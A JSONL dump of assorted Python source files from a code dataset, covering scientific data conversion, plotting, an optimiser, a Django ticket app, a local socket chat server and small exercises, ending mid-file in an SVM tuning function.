iod.import_env_variables(\"./.env\")\nprint(\"Inputs from .env file: \", config)\n\nstart = time()\nflist = convert_files(env_vars=config, opt=opt, ftype=ftype)\nprint(\"Time taken to convert files: {:0.2f}\".format(time() - start))\n# if any raw files have been removed, delete corresponding netCDF files\nif flist is not None:\n print(\"Checking if any netCDF files should be removed...\")\n ncfilelist = glob.glob(\n config[ftype + \"_nc_folder\"] + \"**/*.nc\", recursive=True\n )\n for i, e in enumerate(\n cioos_utils.compare_file_list(sub_set=flist, global_set=ncfilelist)\n ):\n filename = glob.glob(config[ftype + \"_nc_folder\"] + \"**/{}.nc\")\n print(\"deleting file:\", e)\n subprocess.call([\"rm\", \"-f\", e])\nprint(\"Total time taken:{:0.2f}\".format(time() - start))\n","sub_path":"projects/ios_data_transform/ios_data_transform_script.py","file_name":"ios_data_transform_script.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"394294348","text":"import socket\nhost = \"127.0.0.1\"\nport = 12345\nss = socket.socket()\nss.bind((host, port))\nss.listen()\ncs, addr = ss.accept()\nprint(f\"Connection from: {str(addr)}\")\nwhile True:\n data = cs.recv(1024).decode()\n if not data:\n break\n print(f\"from connected user: {str(data)}\")\n print(f\"received from user: {str(data)}\")\n data = input(\"type message: \")\n cs.send(data.encode())\ncs.close()","sub_path":"networking/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"361682762","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sdk import UcloudApiClient\nimport config\nfrom pprint import pprint\nimport sys\n\n\ndef get_metric(region, resource_type, resource_id, metric_name,\n timerange=1 * 60 * 60):\n \"\"\"Get UCloud monitor data\n Region: \"cn-east-01\"|\"cn-north-01\"|\"cn-south-01\"|\"hk-01\"|\"cn-north-02\"\n 华东 北京bgpa 华南 香港 北京bgpb\n ResourceType: 'uhost'|'udb'|'umem'|'ulb'\n MetricName:\n uhost:\n 'NetworkIn'\n 'NetworkOut'\n 'CPUUtilization'\n 'IORead'\n 'IOWrite'\n 'DiskReadOps'\n 'DiskWriteOps'\n 'NICIn'\n 'NICOut'\n 'MemUsage'\n 'DataSpaceUsage'\n 'RootSpaceUsage'\n 'ReadonlyDiskCount'\n 'RunnableProcessCount'\n 'BlockProcessCount'\n udb:\n 'CPUUtilization'\n 'MemUsage'\n 'QPS'\n 'ExpensiveQuery'\n\n ulb:\n 'NetworkOut'\n 'CurrentConnections'\n\n umem:\n 'Usage'\n 'QPS'\n 'InstanceCount'\n\n \"\"\"\n api_client = UcloudApiClient(config.base_url, config.public_key,\n config.private_key)\n\n params = {};\n params['Region'] = region\n params['Action'] = 'GetMetric' \n params['ResourceType'] = resource_type \n params['ResourceID'] = resource_id \n params['MetricName'] = metric_name\n params['TimeRange'] = timerange \n response = api_client.get(\"/\", params)\n pprint(response)\n\n\nif __name__ == '__main__':\n # get_metric('cn-east-01', 'uhost', 'uhost-ezsffw', 'NetworkOut')\n usage = \"%s Region ResourceType ResourceID MetricName [TimeRange]\\n\" % (sys.argv[0])\n argc = len(sys.argv)\n if argc < 5:\n sys.stderr.write(usage)\n sys.exit(1)\n region = sys.argv[1]\n resource_type = sys.argv[2]\n resource_id = sys.argv[3]\n metric_name = sys.argv[4]\n if argc == 6:\n timerange = sys.argv[5]\n get_metric(region, resource_type, resource_id, metric_name)\n","sub_path":"get_metric.py","file_name":"get_metric.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"410455585","text":"import sys\n#sys.argv.append('dell:8');\n#sys.argv.append('toshiba:2');\n#sys.argv.append('dell:2');\n#sys.argv.append('hp:14');\n#arr = sys.argv[1]\n#arr = ['','dell:8', 'toshiba:9', 'acer:5']\nstro = ''\nflag = False\nn=1\ndict = []\n\nwhile n < len(sys.argv):\n x = sys.argv[n]\n o = x.split(':')\n existe = False\n for temp in dict:\n if temp[0] == o[0]:\n existe = True\n temp[1] = temp[1] + int(o[1])\n if not existe:\n dict.append([o[0],int(o[1])])\n #stro += ('\\n-'+o[0]+': '+('*'*int(o[1]))) if flag else ('-'+o[0]+': '+('*'*int(o[1])))\n #flag = True\n n += 1\n\ns = False\n\nl2 = []\nfor x in dict:\n if l2 == []:\n l2.append(x)\n else:\n n = 0\n ins = False\n while n < len(l2):\n if x[1] > l2[n][1]:\n l2.insert(n,x)\n ins = True\n break\n n += 1\n if not ins:\n l2.append(x)\ndict = l2\n\nfor o in dict:\n stro += ('\\n-'+o[0]+': '+('*'*o[1])) if flag else ('-'+o[0]+': '+('*'*o[1]))\n flag = True\nprint (stro)\n","sub_path":"Eliminatoria/barras.py","file_name":"barras.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"549344588","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport time\n\n\nclass Scanner:\n def __init__(self):\n pass\n \n def scan(self, ip):\n if ip == \"cam\":\n # use the webcam to constantly capture frames and \n # look for and scan any SQR codes found\n cap = cv2.VideoCapture(\"http://192.168.31.42:8080/video\")\n cv2.namedWindow(\"original cam feed\")\n cv2.moveWindow(\"original cam feed\", 20, 20)\n cv2.namedWindow(\"processed cam feed\")\n cv2.moveWindow(\"processed cam feed\", 20, 600)\n while cap.isOpened():\n ret, self.frame = cap.read()\n if not ret or self.frame is None:\n break\n\n cv2.imshow(\"original cam feed\", self.frame)\n self._scan()\n\n cv2.imshow(\"processed cam feed\", self.frame)\n resp = cv2.waitKey(1) & 0xFF\n if resp == ord('q'):\n break\n elif resp == ord('p'):\n while True:\n if cv2.waitKey(1) & 0xFF == ord('p'):\n break\n print(\"Terminated\")\n\n else:\n # scan the single input image given as the input\n self.frame = cv2.imread(ip)\n if self.frame is None:\n print(\"Error while opening the image\")\n else:\n self._scan()\n\n def _scan(self):\n start = time.time()\n IMAGE_HEIGHT = 240\n\n frame = self.frame \n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (int(len(frame[0]) / len(frame) * IMAGE_HEIGHT), IMAGE_HEIGHT))\n frame = cv2.adaptiveThreshold(frame, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 23, 2)\n \n \n\n self.frame = frame\n\n print(\"Frame took {} milliseconds.\".format((time.time() - start) * 1000))\n","sub_path":"SQRScanner.py","file_name":"SQRScanner.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"522272798","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\ntry:\n from numpy import array\n from numpy import argmin\n from numpy import delete\n from numpy import eye\n from numpy import min\n from numpy import newaxis\n from numpy import reshape\n from numpy import tile\n from numpy import where\n from numpy import zeros\n from numpy.random import choice\n from numpy.random import rand\n\n from scipy.optimize import fmin_l_bfgs_b\n\nexcept ImportError:\n if 'ironpython' not in sys.version.lower():\n raise\n\nfrom time import time\n\nimport json\n\n\n__author__ = ['Andrew Liew ']\n__copyright__ = 'Copyright 2017, BLOCK Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'liew@arch.ethz.ch'\n\n\n__all__ = [\n 'devo_numpy'\n]\n\n\ndef devo_numpy(fn, bounds, population, generations, limit=0, results=None, vectored=False, F=0.8, CR=0.9, polish=False,\n args=(), callback=None, **kwargs):\n \"\"\"Call the Differential Evolution solver.\n\n Parameters\n ----------\n fn : obj\n The function to evaluate and minimise.\n bounds : list\n Lower and upper bounds for each DoF [[lb, ub], ...].\n population : int\n Number of agents in the population.\n generations : int\n Number of cross-over cycles/steps to perform.\n limit : float\n Value of the objective function for which to terminate optimisation.\n results : str\n Where to store results files.\n vectored : bool\n Vectored function output.\n F : float\n Differential evolution parameter.\n CR : float\n Differential evolution cross-over ratio parameter.\n polish : bool\n Polish the final result with L-BFGS-B.\n args : seq\n Sequence of optional arguments to pass to fn.\n callback : obj\n Callback function for each generation.\n\n Returns\n -------\n float\n Optimal value of objective function.\n list\n Values that give the optimum (minimised) function.\n\n Notes\n -----\n fn must return vectorised output for input (k, population) if vectored is True.\n\n \"\"\"\n tic = time()\n\n # Heading\n\n print('\\n' + '-' * 50)\n print('Differential Evolution started')\n print('-' * 50)\n\n # Setup bounds\n\n k = len(bounds)\n bounds = array(bounds)\n b_max = bounds[:, 1][:, newaxis]\n b_min = bounds[:, 0][:, newaxis]\n lb = tile(b_min, (1, population))\n ub = tile(b_max, (1, population))\n\n # Setup population\n\n agents = (rand(k, population) * (ub - lb) + lb)\n candidates = tile(array(range(population)), (1, population))\n candidates = reshape(delete(candidates, where(eye(population).ravel() == 1)), (population, population - 1))\n\n # Initial conditions\n\n if vectored:\n f = fn(agents, *args)\n else:\n f = zeros(population)\n for i in range(population):\n f[i] = fn(agents[:, i], *args)\n fopt = min(f)\n\n ac = zeros((k, population))\n bc = zeros((k, population))\n cc = zeros((k, population))\n\n ts = 0\n print('\\nGeneration: {0} fopt: {1:.5g}'.format(ts, fopt))\n\n # Start evolution\n\n while ts < generations + 1:\n\n if callback:\n callback(ts, f, **kwargs)\n\n for i in range(population):\n inds = candidates[i, choice(population - 1, 3, replace=False)]\n ac[:, i] = agents[:, inds[0]]\n bc[:, i] = agents[:, inds[1]]\n cc[:, i] = agents[:, inds[2]]\n\n ind = rand(k, population) < CR\n agents_ = ind * (ac + F * (bc - cc)) + ~ind * agents\n log_lb = agents_ < lb\n log_ub = agents_ > ub\n agents_[log_lb] = lb[log_lb]\n agents_[log_ub] = ub[log_ub]\n\n if vectored:\n f_ = fn(agents_, *args)\n else:\n f_ = zeros(population)\n for i in range(population):\n f_[i] = fn(agents_[:, i], *args)\n\n log = where((f - f_) > 0)[0]\n agents[:, log] = agents_[:, log]\n f[log] = f_[log]\n fopt = min(f)\n xopt = agents[:, argmin(f)]\n\n ts += 1\n ac *= 0\n bc *= 0\n cc *= 0\n\n if fopt < limit:\n break\n\n print('Generation: {0} fopt: {1:.5g}'.format(ts, fopt))\n\n # Save generation\n\n if results:\n\n fnm = '{0}generation_{1:0>5}_population.pop'.format(results, ts - 1)\n with open(fnm, 'w') as f:\n\n f.write('Generation\\n')\n f.write('{0}\\n\\n'.format(ts - 1))\n\n f.write('Number of individuals per generation\\n')\n f.write('{0}\\n\\n'.format(population))\n\n f.write('Population scaled variables\\n')\n for i in range(population):\n entry = [str(i)] + [str(j) for j in list(agents[:, i])]\n f.write(', '.join(entry) + '\\n')\n\n f.write('\\nPopulation fitness value\\n')\n for i in range(population):\n f.write('{0}, {1}\\n'.format(i, f[i]))\n\n f.write('\\n')\n\n # L-BFGS-B polish\n\n if polish:\n opt = fmin_l_bfgs_b(fn, xopt, args=args, approx_grad=1, bounds=bounds, iprint=1, pgtol=10**(-6), factr=10000,\n maxfun=10**5, maxiter=10**5, maxls=100)\n xopt = opt[0]\n fopt = opt[1]\n\n # Save parameters\n\n if results:\n\n parameters = {\n 'num_pop': population,\n 'min_fit': limit,\n 'fit_type': 'min',\n 'end_gen': ts - 1,\n 'num_gen': generations - 1,\n 'start_from_gen': 0}\n\n with open('{0}parameters.json'.format(results), 'w+') as fp:\n json.dump(parameters, fp)\n\n # Summary\n\n print('\\n' + '-' * 50)\n print('Differential Evolution finished : {0:.4g} s'.format(time() - tic))\n print('fopt: {0:.3g}'.format(fopt))\n print('-' * 50)\n\n return fopt, list(xopt)\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n\n from compas.plotters.evoplotter import EvoPlotter\n\n def fn(u, *args):\n # Booth's function, fopt=0, uopt=(1, 3)\n x = u[0]\n y = u[1]\n z = (x + 2 * y - 7)**2 + (2 * x + y - 5)**2\n return z\n\n def callback(ts, f, evoplotter):\n evoplotter.update_points(generation=ts, values=f)\n evoplotter.update_lines(generation=ts, values=f)\n\n evoplotter = EvoPlotter(generations=50, fmax=30, xaxis_div=25, yaxis_div=10, pointsize=0.1)\n\n bounds = [(-10, 10), (-15, 15)]\n devo_numpy(fn, bounds, population=20, generations=50, polish=False, callback=callback, evoplotter=evoplotter)\n","sub_path":"src/compas/numerical/solvers/devo_numpy.py","file_name":"devo_numpy.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"47762941","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\nfrom .models import Ticket\nfrom .forms import TicketForm\nfrom .filter import TicketFilter\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom comments.forms import CommentForm\nfrom comments.models import Comment\nfrom django.core.paginator import Paginator\n\ndef get_tickets(request):\n \"\"\"\n Create a view that will return a list\n of Tickets that were published prior to 'now'\n and render them to the 'tickets.html' template\n \"\"\"\n f = TicketFilter(request.GET, queryset=Ticket.objects.all().order_by('-published_date').exclude(payment_status='Not Paid'))\n paginator = Paginator(f.qs, 20)\n \n page = request.GET.get('page')\n page_obj = paginator.get_page(page)\n return render(request, 'tickets.html', {'filter': f, 'page_obj': page_obj})\n \n # return render(request, \"tickets.html\", {'filter': f})\n \ndef ticket_detail(request, pk):\n \"\"\"\n Create a view that returns a single\n Ticket object based on the post ID (pk) or if Type=\"Issue\" and\n render it to the 'ticketdetail.html' template. If Type=\"Feature\"\n render it to the 'ticketpayment.html'.\n Or return a 404 error if the ticket is\n not found\n And allowed users to leave the comments.\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk)\n comments = ticket.comments.all()\n paginator = Paginator(comments, 25)\n \n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n if request.user.is_authenticated:\n comment = comment_form.save(commit=False)\n comment.comment_on = ticket\n comment.comment_author = request.user\n comment.save()\n return redirect('ticket_detail', pk=ticket.pk)\n else:\n messages.success(request, \n \"You have to be logged in to leave a comments.\")\n return redirect('login')\n else:\n comment_form = CommentForm()\n\n \n page = request.GET.get('page')\n page_obj = paginator.get_page(page)\n return render(request, \"ticketdetail.html\", {\n 'ticket': ticket,\n 'comments': comments,\n 'comment_form': comment_form,\n 'page_obj': page_obj,\n })\n\n@login_required() \ndef ticket_prepayment(request, pk):\n \"\"\"\n Create a view that returns a single\n Ticket object based on the post ID (pk) \n render it to the 'cart.html'.\n Or return a 404 error if the ticket is\n not found\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk)\n return render(request, \"prepayment.html\", {'ticket': ticket})\n \n@login_required()\ndef create_or_edit_ticket(request, pk=None):\n \"\"\"\n Create a view that allows us to create\n or edit a ticket depending if the Ticket ID\n is null or not\n \"\"\"\n ticket = get_object_or_404(Ticket, pk=pk) if pk else None\n if request.method == \"POST\":\n form = TicketForm(request.POST, instance=ticket)\n if form.is_valid():\n ticket = form.save(commit=False)\n if str(ticket.ticket_type) == \"Issue\":\n ticket.author = request.user\n ticket.save()\n return redirect(ticket_detail, ticket.pk)\n else:\n ticket.author = request.user\n ticket.payment_status = 'Not Paid'\n ticket.save()\n return redirect('ticket_prepayment', pk=ticket.pk)\n else:\n form = TicketForm(instance=ticket)\n return render(request, 'ticketform.html', {'form': form, 'ticket': ticket})","sub_path":"tickets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"30781931","text":"import matplotlib.ticker as ticker\nimport matplotlib.tri as tri\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport h5py\nimport os\nimport shutil\nimport matplotlib as mpl\nmpl.use('Agg')\n# Shut down console graphic display\n\nresultpath = '/root/msys_sandbox/'\nnewpath = resultpath + 'Buislopemiden/'\nresultstart = 'buislopemiden_'\nos.mkdir(newpath)\nos.mkdir(newpath + 'Position/')\nos.mkdir(newpath + 'Deformation/')\nos.mkdir(newpath + 'Deformation/pics/')\nos.mkdir(newpath + 'Deformation/video/')\nos.mkdir(newpath + 'Strain/')\nos.mkdir(newpath + 'Strain/' + 'pics/')\nos.mkdir(newpath + 'Strain/' + 'video/')\n\nfilePath = resultpath\nfor i in os.listdir(filePath):\n if i.startswith(resultstart):\n if i.endswith('.h5'):\n synpo = i.index('_')\n ii = i[synpo + 1]\n if ii.isnumeric() is True:\n shutil.copy2(i, newpath)\n# Copy corresponding h5 files to new folder\n\nfin = h5py.File(resultpath+resultstart+'Initial.h5', mode='r')\niniSPHposition = fin.get('Position')\ndsp = len(iniSPHposition)\nrowsp = int(dsp/3)\niniSPHposition = np.array(iniSPHposition).reshape(rowsp, 3)\nnp.savetxt(newpath+'iniSPHposition.txt', iniSPHposition)\n# Plot setting start\nX = iniSPHposition[:, 0]\nX = X.flatten()\nY = iniSPHposition[:, 1]\nY = Y.flatten()\ntriang = tri.Triangulation(X, Y)\n\niniDEMposition = fin.get('DEMPosition')\ndp = len(iniDEMposition)\nrowdp = int(dp/3)\niniDEMposition = np.array(iniDEMposition).reshape(rowdp, 3)\nnp.savetxt(newpath+'iniDEMposition.txt', iniDEMposition)\ndexin = np.min(iniDEMposition[:, 0])\ndexinmax = np.max(iniDEMposition[:, 0])\ndeyin = np.min(iniDEMposition[:, 1])\ndeyinmax = np.max(iniDEMposition[:, 1])\ndezin = np.min(iniDEMposition[:, 2])\nfnn = (deyinmax-deyin)/(dexinmax-dexin)\n# PLot setting end\n\n# Max and min strain\nfilePath = newpath\nstmax = 1*1e-10\nstmin = 1*1e-10\nfor i in os.listdir(filePath):\n if i.endswith('.h5'):\n f = h5py.File(i, mode='r')\n SPHstrain = f.get('Strain')\n # For 2D simulation, 6 elements for each particle.\n # For 3D simulation, 9 elements for each particle.\n dst = len(SPHstrain)\n rowst = int(dst/6)\n SPHstrain = np.array(SPHstrain).reshape(rowst, 6)\n SPHstring = 0.5*(SPHstrain[:, 0]+SPHstrain[:, 4])\n fstmax = np.max(SPHstring)\n fstmin = np.min(SPHstring)\n if fstmax > stmax:\n stmax = fstmax\n if fstmin < stmin:\n stmin = fstmin\n\n# Final step for plotting\nfilePath = newpath\nfor i in os.listdir(filePath):\n if i.endswith('.h5'):\n f = h5py.File(i, mode='r')\n SPHstrain = f.get('Strain')\n # For 2D simulation, 6 elements for each particle.\n # For 3D simulation, 9 elements for each particle.\n dst = len(SPHstrain)\n rowst = int(dst/6)\n SPHstrain = np.array(SPHstrain).reshape(rowst, 6)\n # read, reshape and save SPH particles strain data\n\n SPHposition = f.get('Position')\n sp = len(SPHposition)\n rowsp = int(sp/3)\n SPHposition = np.array(SPHposition).reshape(rowsp, 3)\n # read, reshape and save SPH particles position data\n\n DEMposition = f.get('DEMPosition')\n dp = len(DEMposition)\n rowdp = int(dp/3)\n DEMposition = np.array(DEMposition).reshape(rowdp, 3)\n dexm = DEMposition[1, 0]\n deym = DEMposition[0, 1]\n dezm = 0\n # read, reshape and save DEM particles position data\n\n deltm = np.ones((rowsp, 3))\n deltm[:, 0] = deltm[:, 0]*dexm\n deltm[:, 1] = deltm[:, 1]*deym\n deltm[:, 2] = deltm[:, 2]*dezm\n # create a new array to save DEM axia limitation\n\n AA = np.zeros((rowsp, 3))\n AA[:, 0] = SPHposition[:, 0] - deltm[:, 0]\n AA[:, 1] = SPHposition[:, 1] - deltm[:, 1]\n AA[:, 2] = SPHposition[:, 2] - deltm[:, 2]\n # record the relative position to DEM axia limitation of SPH particles\n\n# =============================================================================\n# Please do not delete\n# name = filename+'.txt'\n# namesp = filename.lstrip(resultstart)+'.txt'\n# np.savetxt(filePath+'Strain/'+name,SPHstrain)\n# np.savetxt(filePath+'Position/'+namesp,SPHposition)\n# =============================================================================\n\n filename = i.rstrip('h5')\n filename = filename.rstrip('.')\n # Attention please, pictures are suggested to name by number for other\n # function could read pictures files in the actually orders.\n # ===== Strain Contour Plotting\n name = filename+'.npy'\n namesp = filename.lstrip(resultstart)+'.npy'\n np.save(filePath+'Strain/'+name, SPHstrain)\n np.save(filePath+'Position/'+namesp, SPHposition)\n np.save(filePath+'Deformation/'+namesp, AA)\n # Strain Plot start\n Z = 0.5*SPHstrain[:, 0]+0.5*SPHstrain[:, 4]\n # 0.5*(Epsilon11 + 22) for 2D\n Z = Z.flatten()\n # Z :accumulated deviatoric strain\n fig1, ax1 = plt.subplots(\n constrained_layout=True, figsize=(3.5, 3.5), dpi=300)\n # ax1 = plt.figure(figsize=(7,7*fnn),dpi=300)\n ax1.set_aspect('equal')\n ax1.set_title('SPH particle number = ' + str(rowsp) +\n ' Step = '+filename.lstrip(resultstart), fontsize=8)\n tt = ax1.tricontourf(triang, Z, cmap=\"jet\",\n levels=np.linspace(stmin, stmax, 100))\n plt.xticks(np.linspace(0, 0.9, 10), fontsize=8)\n plt.yticks(np.linspace(0, 0.5, 6), fontsize=8)\n plt.xlabel('Distance', fontsize=8)\n plt.ylabel('Elevation', fontsize=8)\n cb = fig1.colorbar(tt, orientation='horizontal', fraction=0.1)\n ticker_locator = ticker.MaxNLocator(nbins=5)\n cb.locator = ticker_locator\n cb.set_ticks([stmin, 0.25*(stmin+stmax), 0.5 *\n (stmin+stmax), 0.75*(stmin+stmax), stmax])\n cb.ax.tick_params(labelsize=8)\n cb.update_ticks()\n filename = filename.lstrip(resultstart)\n plt.savefig(newpath+'Strain/'+'pics/'+filename+'.png')\n # ===== Strain Plot end\n\n picPath = newpath + 'Deformation/pics/'\n plt.subplots(constrained_layout=True)\n x = AA[:, 0]\n y = AA[:, 1]\n plt.figure(figsize=(7, 7*fnn), dpi=300)\n # plot setting, unit inch\n plt.axis([0, dexinmax-dexin, 0, deyinmax-dexin])\n # axia setting\n plt.title('SPH particle number = ' + str(rowsp) +\n ' Step = '+filename, fontsize=8)\n plt.xlabel('Distance')\n plt.ylabel('Elevation')\n plt.scatter(x, y, s=1.0)\n plt.savefig(picPath+filename+'.png')\n # jpg format couldn't be applied here\n","sub_path":"buislope.py","file_name":"buislope.py","file_ext":"py","file_size_in_byte":6732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"112062555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 02:15:22 2020\n\n@author: bingkun\n@project: hfb -- eqtl\n\n* process of eqtl tss/snp region after intersecting with interactions\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport seaborn as sns\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\nmatplotlib.rcParams['figure.dpi']= 200\n\n\n# def post_intersect_eqtl(sig_tss, sig_snp, nonsig_tss, nonsig_snp, cellType):\ndate = \"0115\" \ncellType = \"RGC\"\n\nsig_tss = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_sig_intersect_etql.tss'.format(cellType)\nsig_snp = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_sig_intersect_etql.snp'.format(cellType)\nnonsig_tss = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_nonsig_intersect_etql.tss'.format(cellType)\nnonsig_snp = r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_nonsig_intersect_etql.snp'.format(cellType)\n\nsig_tss_df = pd.read_csv(sig_tss, sep=\"\\t\", names=[\"chr\", \"start_tss\", \"end_tss\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nsig_snp_df = pd.read_csv(sig_snp, sep=\"\\t\", names=[\"chr\", \"start_snp\", \"end_snp\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nnonsig_tss_df = pd.read_csv(nonsig_tss, sep=\"\\t\", names=[\"chr\", \"start_tss\", \"end_tss\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nprint (\"nonsig tss duplicates: \", nonsig_tss_df[[\"pair_id\"]].shape[0] - nonsig_tss_df[[\"pair_id\"]].drop_duplicates().shape[0])\nnonsig_snp_df = pd.read_csv(nonsig_snp, sep=\"\\t\", names=[\"chr\", \"start_snp\", \"end_snp\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\nprint (\"nonsig snp duplicates: \", nonsig_snp_df[[\"pair_id\"]].shape[0] - nonsig_snp_df[[\"pair_id\"]].drop_duplicates().shape[0])\n#nonsig_snp_df_dup_bool = nonsig_snp_df.duplicated(subset=['pair_id'], keep=False)\n#nonsig_snp_df_dup = nonsig_snp_df.loc[nonsig_snp_df_dup_bool == True]\n\nsig_merged = pd.merge(sig_tss_df, sig_snp_df, on = [\"chr\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\n# check dups -- should be 0\nprint (\"sig duplicates: \", sig_merged[[\"pair_id\"]].shape[0] - sig_merged[[\"pair_id\"]].drop_duplicates().shape[0])\nnonsig_merged = pd.merge(nonsig_tss_df, nonsig_snp_df, on = [\"chr\", \"pair_id\", \"gene_id\", \"npval\", \"dist\"])\n#nonsig_merged_dup_bool = nonsig_merged.duplicated(subset=['pair_id'], keep=False)\n#nonsig_merged_dup = nonsig_merged.loc[nonsig_merged_dup_bool == True]\nprint (\"nonsig duplicates: \", nonsig_merged[[\"pair_id\"]].shape[0] - nonsig_merged[[\"pair_id\"]].drop_duplicates().shape[0])\nprint ('removing duplicates...')\nsig_merged = sig_merged.drop_duplicates(subset=['pair_id'])\nnonsig_merged = nonsig_merged.drop_duplicates(subset=['pair_id'])\n\nnpval_compair = pd.DataFrame()\nnpval_compair[\"{}_non_signif\".format(cellType)] = nonsig_merged[\"npval\"]\nnpval_compair[\"{}_signif\".format(cellType)] = sig_merged[\"npval\"]\nnpval_compair.to_csv(\"npval_compair_{}\".format(cellType), sep=\"\\t\", index=False, header=True)\nnpval_compair_melt = pd.melt(npval_compair, value_name=\"npval\", var_name=\"\")\n\nprint (\"sig pval: \", sig_merged[\"npval\"].describe())\nprint (\"nonsig pval: \", nonsig_merged[\"npval\"].describe())\nprint(stats.ks_2samp(sig_merged[\"npval\"], nonsig_merged[\"npval\"]))\n\nplt.figure(figsize=(10,7))\nsns.violinplot(x=\"\", y=\"npval\", data=npval_compair_melt, palette=\"Pastel1\", cut=0)\nplt.savefig(r'C:\\Users\\libin\\UCSF\\hfb\\eqtl\\20200115\\{}_{}_pval_compare.pdf'.format(cellType, date), transparent=True)\n\n# post_intersect_eqtl(sig_tss=sys.argv[1], sig_snp=sys.argv[2], nonsig_tss=sys.argv[3], nonsig_snp=sys.argv[4], cellType=sys.argv[5])","sub_path":"eQTL/post_intersection_eqtl.py","file_name":"post_intersection_eqtl.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"642119853","text":"from random import randint\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nmoves=[rock,paper,scissors]\ncomputer=moves[randint(0,2)]\nplayer=(int(input(\"Enter your move \\n1:Rock\\n2:paper\\n3:scissors \\n\")))-1\n3\nif(player not in range(0,3)):\n print(\"Sorry wrong move! You loose\")\nelse:\n print(f'YOUR MOVE {moves[player]}')\n print(f\"COMPUTER'S MOVE {computer}\")\n if(moves[player]==computer):\n print(\"It's a tie\")\n elif(computer==moves[0]):\n if(moves[player]==moves[1]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n elif(computer==moves[1]):\n if(moves[player]==moves[2]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n else:\n if(moves[player]==moves[0]):\n print(\"You won!!\")\n else:\n print(\"You loose\")\n \n \n","sub_path":"Random Codes/ASCII-ART-StonePaperScissors/stonepaperscissors.py","file_name":"stonepaperscissors.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"327570316","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#########################################################\n# Author: Author \n#########################################################\n# File: listagem101.py\n# Description: Modelagem de uma televisão\n\nclass Televisao: \n\tdef __init__(self, min, max, canal):\n\t\tself.ligada = False \n\t\tself.canal = canal\n\t\tself.cmin = min \n\t\tself.cmax = max \n\n\tdef muda_canal_para_cima(self):\n\t\tif self.canal+1 <= self.cmax:\n\t\t\tself.canal += 1\n\n\tdef muda_canal_para_baixo(self):\n\t\tif self.canal-1 >= self.cmin:\n\t\t\tself.canal -= 1\n\ntv = Televisao(1,99,1)\n\nfor _ in range(0,120):\n\ttv.muda_canal_para_cima()\nprint(tv.canal)\n\nfor _ in range(0,120):\n\ttv.muda_canal_para_baixo()\n\nprint(tv.canal)\n","sub_path":"cap10/listagem101.py","file_name":"listagem101.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"175208983","text":"import numpy as np\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom sklearn.model_selection import KFold\n\n\ndef tune_slack(X, T, kernel=\"gaussian\", r=0.5, poly=2, sigma=2):\n c_array = np.power(2*np.ones(20), np.arange(-5, 15))\n errors = []\n\n for c in c_array:\n err = 0\n cv = KFold(n_splits=5)\n\n for train_index, test_index in cv.split(X):\n X_train, X_test, T_train, T_test = 